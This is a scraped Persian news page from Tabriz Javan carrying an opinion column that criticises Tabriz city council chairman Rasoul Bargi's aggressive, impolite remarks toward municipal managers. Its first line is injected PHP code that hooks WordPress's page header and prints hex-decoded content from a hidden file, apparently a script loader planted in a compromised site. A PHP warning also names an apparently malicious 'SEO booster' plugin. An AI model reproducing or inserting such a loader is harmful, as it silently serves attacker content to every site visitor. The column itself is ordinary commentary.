if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } }
Warning: session_start(): Cannot start session when headers already sent in /home3/tabrizj3/public_html/wp-content/plugins/wp-seo-booster-pro/wp-seo-booster-pro.php on line 44
آقای برگی! می ترسیم یاتاقان بزنید! - تبریز جوان
کد خبر : 58344
تاریخ انتشار : چهارشنبه ۲۵ اسفند ۱۴۰۰ - ۱۵:۲۴

نقدی بر ادبیات غیرمودبانه آقای رییس؛

آقای برگی! می ترسیم یاتاقان بزنید!

آقای برگی! می ترسیم یاتاقان بزنید!
رصد رفتارها و تحلیل اظهارات و ادبیات کلامی ماه های گذشته رییس این روزهای شورای شهر تبریز را بدون تردید باید یکی از نگران کننده ترین بخش های پنهان و کم تر پرداخت شده شورای ششم ارزیابی کرد.

پایگاه خبری تبریز جوان| امیر لیل آبادی/ رصد رفتارها و تحلیل اظهارات و ادبیات کلامی ماه های گذشته رییس این روزهای شورای شهر تبریز را بدون تردید باید یکی از نگران کننده ترین بخش های پنهان و کم تر پرداخت شده شورای ششم ارزیابی کرد.

رسول برگی که تا پیش از ورود به شورا و جلوس در جایگاه ریاست، بیشتر به عنوان یک خطیب و روحانی منبری در فضای سیاسی، اجتماعی و فرهنگی تبریز چهره شده بود، این روزها در حالی با همان ادبیات پرخاشگرانه و مدعیانه مشغول ریاست بر شورای شهر است که به زعم اغلب اهالی رسانه، کارشناسان مسایل شهری و مدیریتی و حتی قاطبه وعاظ و روحانیون تبریز، مشی، لحن، کنش و واکنش های هیجانی و تبلیغاتی اش، بیش از آن که رنگ و بوی وعظ و خطابه های مودبانه و متین داشته باشد، ملبس به ردای طلبکاری سیاسی به جای مطالبه گری هوشمندانه و منطقی شده است.

واژگان و جملاتی همچون “منیم ماشینیم قره دی”، “بیز قویماروخ”، “مدیرلر غلط ائلیلر” و جملات و اظهاراتی از این دست، که در صحن علنی شورا از زبان این روحانی جوان و از جایگاه ریاست شورای شهر مطرح و ایراد شده اند، تنها بخشی از موضع گیری ها و اظهارات پرخاشگرانه و غیرمودبانه رسول برگی است که خطاب به مدیران شهری و در واکنش به برخی سوء مدیریت ها و مشکلات حاکم بر شهرداری تبریز ایراد و البته با واکنش های منفی افکار عمومی و نخبگان مواجه نیز شده اند.

رییس شورای شهر، طی اظهارنظری جنجالی، با خطاب قرار دادن برخی مدیران شهرداری که به زعم وی از پاسخ گویی به شورای شهر سر باز زده اند، با ایراد این جمله که “مدیران غیر پاسخ گو غلط می کنند”، بار دیگر به صدر اخبار رسانه های محلی آمد.

هرچند تردیدی در پاسخ گو نبودن بخشی از بدنه مدیریت شهری در قبال مردم، شورا و نهادهای بالادستی نیست و نظارت و پاسخ گو کردن این دسته از مدیران از وظایف شورای شهر به شمار می رود؛ با این حال، این نوع از اظهارنظر توهین آمیز و غیرمودبانه از سوی رییسی که نماینده 12 عضو دیگر به شمار می رود و در عین حال، از جایگاه حقوقی شورای شهر سخن می گوید، به هیچ وجه زیبنده نیست.

چه خوب است جناب برگی توجه داشته باشد که این جایگاه و ریاست بر شورای شهری همانند تبریز، جدای از آن که مسئولیتی نیابتی و تفویضی به شمار می رود، زودگذر و موقتی نیز است و چنین رفتارها و اظهارنظرهای رادیکال و دون شأن شورا، روحانیت و وکالت مردم، نه تنها سمی مهلک برای اعتماد عمومی تلقی می شود؛ بلکه به هیچ وجه از حافظه تاریخی مردم و رسانه ها پاک نخواهد شد.

سخن آخر این که، این وسط فقط می ترسیم، با سرعت و شتابی که جناب برگی در طلبکاری های شخصی و سلیقه ای دارند، در کوره راه مطالبه گری ناشیانه شان، یاتاقان بزنند …

برچسب ها :

ناموجود
ارسال نظر شما
مجموع نظرات : 0 در انتظار بررسی : 0 انتشار یافته : 0
  • نظرات ارسال شده توسط شما، پس از تایید توسط مدیران سایت منتشر خواهد شد.
  • نظراتی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
  • نظراتی که به غیر از زبان فارسی یا غیر مرتبط با خبر باشد منتشر نخواهد شد.